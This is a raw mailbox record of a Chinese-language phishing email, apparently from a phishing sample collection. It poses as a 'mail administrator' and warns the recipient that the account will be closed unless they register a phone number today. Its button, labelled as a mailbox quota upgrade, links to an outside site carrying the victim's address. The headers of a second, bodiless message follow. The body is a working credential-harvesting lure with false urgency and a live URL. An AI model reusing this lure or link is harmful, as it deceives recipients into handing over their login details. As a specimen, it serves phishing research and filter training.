From: Admin<>
Date: Thu, 19 Apr 2018 13:43:06 +0800
Status: O
X-Status: 
X-Keywords:                  
X-UID: 466

You will not see this in a MIME-aware mail reader.
--===============1491575593==
Content-Type: text/plain; charset="utf-8"
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Content-Description: Mail message body

=4F60=597D jose@monkey.org  =

 =70BA=4E86=589E=52A0=6211=5011=7684=5B89=5168=6027=FF0C =6240=6709=96FB=
=5B50=90F5=4EF6=7528=6236=5FC5=9808=7ACB =5373=8A3B=518A=4ED6=5011=7684=
=624B=6A5F=865F =5982=679C=60A8=4ECA=5929=6C92=6709=5B8C=6210=8A3B=518A =
=FF0C=60A8=7684=96FB=5B50=90F5=4EF6=5C07=88AB=95DC=9589 =3002 =


 =

    =5347=7EA7=90AE=7BB1=914D=989D=8FD9=91CC


=4E00=65E6=5347=7EA7=5B8C=6210=FF0C=60A8=7684=90AE=7BB1=5C06=6709=6548=5730=
=5DE5=4F5C=3002 =


=90AE=4EF6=7BA1=7406=5458 2018
--===============1491575593==
Content-Type: text/html; charset="utf-8"
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Content-Description: Mail message body

<HTML><head><meta http-equiv=3D"Content-Type" content=3D"text/html; charset=
=3Dutf-8"/></head><BODY><DIV style=3D"FONT-SIZE: 12px; FONT-FAMILY: arial, =
sans-serif; WHITE-SPACE: normal; WORD-SPACING: 0px; TEXT-TRANSFORM: none; F=
ONT-WEIGHT: 400; COLOR: rgb(34,34,34); FONT-STYLE: normal; ORPHANS: 2; WIDO=
WS: 2; LETTER-SPACING: normal; BACKGROUND-COLOR: rgb(255,255,255); TEXT-IND=
ENT: 0px; font-variant-ligatures: normal; font-variant-caps: normal; -webki=
t-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-c=
olor: initial"><FONT color=3D#000000 face=3Dverdana><SPAN style=3D"FONT-SIZ=
E: 12px">=E4=BD=A0=E5=A5=BD jose@monkey.org&nbsp;</SPAN></FONT></DIV>
<DIV style=3D"FONT-SIZE: 12px; FONT-FAMILY: arial, sans-serif; WHITE-SPACE:=
 normal; WORD-SPACING: 0px; TEXT-TRANSFORM: none; FONT-WEIGHT: 400; COLOR: =
rgb(34,34,34); FONT-STYLE: normal; ORPHANS: 2; WIDOWS: 2; LETTER-SPACING: n=
ormal; BACKGROUND-COLOR: rgb(255,255,255); TEXT-INDENT: 0px; font-variant-l=
igatures: normal; font-variant-caps: normal; -webkit-text-stroke-width: 0px=
; text-decoration-style: initial; text-decoration-color: initial"><FONT col=
or=3D#000000 face=3Dverdana><SPAN style=3D"FONT-SIZE: 12px"><BR></SPAN></FO=
NT></DIV>
<DIV style=3D"FONT-SIZE: 12px; FONT-FAMILY: arial, sans-serif; WHITE-SPACE:=
 normal; WORD-SPACING: 0px; TEXT-TRANSFORM: none; FONT-WEIGHT: 400; COLOR: =
rgb(34,34,34); FONT-STYLE: normal; ORPHANS: 2; WIDOWS: 2; LETTER-SPACING: n=
ormal; BACKGROUND-COLOR: rgb(255,255,255); TEXT-INDENT: 0px; font-variant-l=
igatures: normal; font-variant-caps: normal; -webkit-text-stroke-width: 0px=
; text-decoration-style: initial; text-decoration-color: initial"><FONT col=
or=3D#000000 face=3Dverdana><SPAN style=3D"FONT-SIZE: 12px">=E7=82=BA=E4=BA=
=86=E5=A2=9E=E5=8A=A0=E6=88=91=E5=80=91=E7=9A=84=E5=AE=89=E5=85=A8=E6=80=A7=
=EF=BC=8C =E6=89=80=E6=9C=89=E9=9B=BB=E5=AD=90=E9=83=B5=E4=BB=B6=E7=94=A8=
=E6=88=B6=E5=BF=85=E9=A0=88=E7=AB=8B =E5=8D=B3=E8=A8=BB=E5=86=8A=E4=BB=96=
=E5=80=91=E7=9A=84=E6=89=8B=E6=A9=9F=E8=99=9F&nbsp;</SPAN></FONT></DIV><FON=
T style=3D"FONT-SIZE: 12px; WHITE-SPACE: normal; WORD-SPACING: 0px; TEXT-TR=
ANSFORM: none; FONT-WEIGHT: 400; FONT-STYLE: normal; ORPHANS: 2; WIDOWS: 2;=
 LETTER-SPACING: normal; BACKGROUND-COLOR: rgb(255,255,255); TEXT-INDENT: 0=
px; font-variant-ligatures: normal; font-variant-caps: normal; -webkit-text=
-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: =
initial" color=3D#000000 face=3Dverdana><SPAN style=3D"FONT-SIZE: 12px">=E5=
=A6=82=E6=9E=9C=E6=82=A8=E4=BB=8A=E5=A4=A9=E6=B2=92=E6=9C=89=E5=AE=8C=E6=88=
=90=E8=A8=BB=E5=86=8A =EF=BC=8C=E6=82=A8=E7=9A=84=E9=9B=BB=E5=AD=90=E9=83=
=B5=E4=BB=B6=E5=B0=87=E8=A2=AB=E9=97=9C=E9=96=89&nbsp;</SPAN></FONT><SPAN s=
tyle=3D"FONT-SIZE: 12px; FONT-FAMILY: verdana; WHITE-SPACE: normal; WORD-SP=
ACING: 0px; TEXT-TRANSFORM: none; FONT-WEIGHT: 400; COLOR: rgb(0,0,0); FONT=
-STYLE: normal; ORPHANS: 2; WIDOWS: 2; LETTER-SPACING: normal; BACKGROUND-C=
OLOR: rgb(255,255,255); TEXT-INDENT: 0px; font-variant-ligatures: normal; f=
ont-variant-caps: normal; -webkit-text-stroke-width: 0px; text-decoration-s=
tyle: initial; text-decoration-color: initial">=E3=80=82&nbsp;</SPAN><BR st=
yle=3D"FONT-SIZE: 12px; FONT-FAMILY: verdana; WHITE-SPACE: normal; WORD-SPA=
CING: 0px; TEXT-TRANSFORM: none; FONT-WEIGHT: 400; COLOR: rgb(0,0,0); FONT-=
STYLE: normal; ORPHANS: 2; WIDOWS: 2; LETTER-SPACING: normal; BACKGROUND-CO=
LOR: rgb(255,255,255); TEXT-INDENT: 0px; font-variant-ligatures: normal; fo=
nt-variant-caps: normal; -webkit-text-stroke-width: 0px; text-decoration-st=
yle: initial; text-decoration-color: initial"><BR style=3D"FONT-SIZE: 12px;=
 FONT-FAMILY: verdana; WHITE-SPACE: normal; WORD-SPACING: 0px; TEXT-TRANSFO=
RM: none; FONT-WEIGHT: 400; COLOR: rgb(0,0,0); FONT-STYLE: normal; ORPHANS:=
 2; WIDOWS: 2; LETTER-SPACING: normal; BACKGROUND-COLOR: rgb(255,255,255); =
TEXT-INDENT: 0px; font-variant-ligatures: normal; font-variant-caps: normal=
; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-deco=
ration-color: initial">
<TABLE style=3D"FONT-SIZE: 12px; FONT-FAMILY: verdana; WHITE-SPACE: normal;=
 WORD-SPACING: 0px; TEXT-TRANSFORM: none; FONT-WEIGHT: 400; COLOR: rgb(34,3=
4,34); FONT-STYLE: normal; ORPHANS: 2; WIDOWS: 2; LETTER-SPACING: normal; T=
EXT-INDENT: 0px; font-variant-ligatures: normal; font-variant-caps: normal;=
 -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decor=
ation-color: initial" height=3D40 width=3D400 bgColor=3D#424242>
<TBODY>
<TR>
<TD style=3D"FONT-SIZE: 10px; FONT-FAMILY: arial, sans-serif; MARGIN: 0px">
<DIV align=3Dcenter><FONT color=3D#ffffff size=3D2 face=3Dverdana><A style=
=3D"COLOR: rgb(0,0,204)" href=3D"https://cadizciudad.com/.home/public/main?=
a=3Djose@monkey.org" rel=3D"noreferrer noreferrer noreferrer" target=3D_bla=
nk data-saferedirecturl=3D"https://www.google.com/url?hl=3Den&amp;q=3Dhttps=
://cadizciudad.com/.home/public/main?a%3D25&amp;source=3Dgmail&amp;ust=3D15=
24115579255000&amp;usg=3DAFQjCNEPZ_9XWb1Jiyp7sTz6u45_DjHSiw">=E5=8D=87=E7=
=BA=A7=E9=82=AE=E7=AE=B1=E9=85=8D=E9=A2=9D=E8=BF=99=E9=87=8C</A></FONT></DI=
V></TD></TR></TBODY></TABLE><BR style=3D"FONT-SIZE: 12px; FONT-FAMILY: verd=
ana; WHITE-SPACE: normal; WORD-SPACING: 0px; TEXT-TRANSFORM: none; FONT-WEI=
GHT: 400; COLOR: rgb(0,0,0); FONT-STYLE: normal; ORPHANS: 2; WIDOWS: 2; LET=
TER-SPACING: normal; BACKGROUND-COLOR: rgb(255,255,255); TEXT-INDENT: 0px; =
font-variant-ligatures: normal; font-variant-caps: normal; -webkit-text-str=
oke-width: 0px; text-decoration-style: initial; text-decoration-color: init=
ial"><BR style=3D"FONT-SIZE: 12px; FONT-FAMILY: verdana; WHITE-SPACE: norma=
l; WORD-SPACING: 0px; TEXT-TRANSFORM: none; FONT-WEIGHT: 400; COLOR: rgb(0,=
0,0); FONT-STYLE: normal; ORPHANS: 2; WIDOWS: 2; LETTER-SPACING: normal; BA=
CKGROUND-COLOR: rgb(255,255,255); TEXT-INDENT: 0px; font-variant-ligatures:=
 normal; font-variant-caps: normal; -webkit-text-stroke-width: 0px; text-de=
coration-style: initial; text-decoration-color: initial"><SPAN style=3D"FON=
T-SIZE: 12px; FONT-FAMILY: verdana; WHITE-SPACE: normal; WORD-SPACING: 0px;=
 TEXT-TRANSFORM: none; FONT-WEIGHT: 400; COLOR: rgb(0,0,0); FONT-STYLE: nor=
mal; ORPHANS: 2; WIDOWS: 2; LETTER-SPACING: normal; BACKGROUND-COLOR: rgb(2=
55,255,255); TEXT-INDENT: 0px; font-variant-ligatures: normal; font-variant=
-caps: normal; -webkit-text-stroke-width: 0px; text-decoration-style: initi=
al; text-decoration-color: initial">=E4=B8=80=E6=97=A6=E5=8D=87=E7=BA=A7=E5=
=AE=8C=E6=88=90=EF=BC=8C=E6=82=A8=E7=9A=84=E9=82=AE=E7=AE=B1=E5=B0=86=E6=9C=
=89=E6=95=88=E5=9C=B0=E5=B7=A5=E4=BD=9C=E3=80=82&nbsp;</SPAN><BR style=3D"F=
ONT-SIZE: 12px; FONT-FAMILY: verdana; WHITE-SPACE: normal; WORD-SPACING: 0p=
x; TEXT-TRANSFORM: none; FONT-WEIGHT: 400; COLOR: rgb(0,0,0); FONT-STYLE: n=
ormal; ORPHANS: 2; WIDOWS: 2; LETTER-SPACING: normal; BACKGROUND-COLOR: rgb=
(255,255,255); TEXT-INDENT: 0px; font-variant-ligatures: normal; font-varia=
nt-caps: normal; -webkit-text-stroke-width: 0px; text-decoration-style: ini=
tial; text-decoration-color: initial"><BR style=3D"FONT-SIZE: 12px; FONT-FA=
MILY: verdana; WHITE-SPACE: normal; WORD-SPACING: 0px; TEXT-TRANSFORM: none=
; FONT-WEIGHT: 400; COLOR: rgb(0,0,0); FONT-STYLE: normal; ORPHANS: 2; WIDO=
WS: 2; LETTER-SPACING: normal; BACKGROUND-COLOR: rgb(255,255,255); TEXT-IND=
ENT: 0px; font-variant-ligatures: normal; font-variant-caps: normal; -webki=
t-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-c=
olor: initial"><SPAN style=3D"FONT-SIZE: 12px; FONT-FAMILY: verdana; WHITE-=
SPACE: normal; WORD-SPACING: 0px; TEXT-TRANSFORM: none; FONT-WEIGHT: 400; C=
OLOR: rgb(0,0,0); FONT-STYLE: normal; ORPHANS: 2; WIDOWS: 2; LETTER-SPACING=
: normal; BACKGROUND-COLOR: rgb(255,255,255); TEXT-INDENT: 0px; font-varian=
t-ligatures: normal; font-variant-caps: normal; -webkit-text-stroke-width: =
0px; text-decoration-style: initial; text-decoration-color: initial">=E9=82=
=AE=E4=BB=B6=E7=AE=A1=E7=90=86=E5=91=98 2018</SPAN></BODY></HTML>
--===============1491575593==--

From jose@monkey.org Thu Apr 19 14:48:15 2018 +0000
Return-Path: ljiljana.pajeska@mint.hr
Delivered-To: jose@monkey.org
X-FDA: 74072232150.34.ship60_2ad8f95162547
X-Spam-Summary: 50,0,0,6c96d9815c061d15,d41d8cd98f00b204,ljiljana.pajeska@mint.hr,:ljiljana.pajeska@mint.hr,RULES_HIT:10:72:152:334:355:368:369:379:599:960:962:967:973:978:983:988:989:1189:1208:1221:1260:1263:1313:1345:1359:1381:1431:1436:1437:1516:1517:1518:1575:1588:1589:1592:1594:1730:1776:1792:1801:2194:2198:2199:2200:2525:2527:2540:2551:2561:2564:2682:2685:2859:2892:2895:2900:2901:2924:2926:2933:2937:2939:2942:2945:2947:2951:2954:3022:3138:3139:3140:3141:3142:3148:3354:3521:3522:3523:3586:3865:3866:3867:3868:3870:3871:3872:3873:3934:3936:3938:3941:3944:3947:3950:3953:3956:3959:4250:4605:4860:5007:6238:6261:6650:6678:6703:7576:7782:7903:7904:8512:8514:8518:8583:8603:8777:8957:9025:9121:9149:9388:9545:9855:10049:10205:10261:10346:10394:11233:11651:11656:11657:11855:11875:11914:12043:12050:12291:12438:12555:12657:12661:12679:12683:12895:13005:13017:13018:13019:13025:13139:13237:13893:14096:14110:14141:14659:21063:21080:21325:21364:21433:21451:21627:30021:30022:30028:30034:30054:300
X-HE-Tag: ship60_2ad8f95162547
X-Filterd-Recvd-Size: 100364
Received: from owa.mint.hr (owa.mint.hr [212.92.198.35])
	by imf19.b.hostedemail.com (Postfix) with ESMTP
	for <jose@monkey.org>; Thu, 19 Apr 2018 14:48:14 +0000 (UTC)
X-Assp-Version: 2.5.5(16366) on MINT-ASSP.mint.local
X-Assp-ID: MINT-ASSP.mint.local m1-49253-00992
X-Assp-Session: 7F0810EFEDD0 (mail 1)
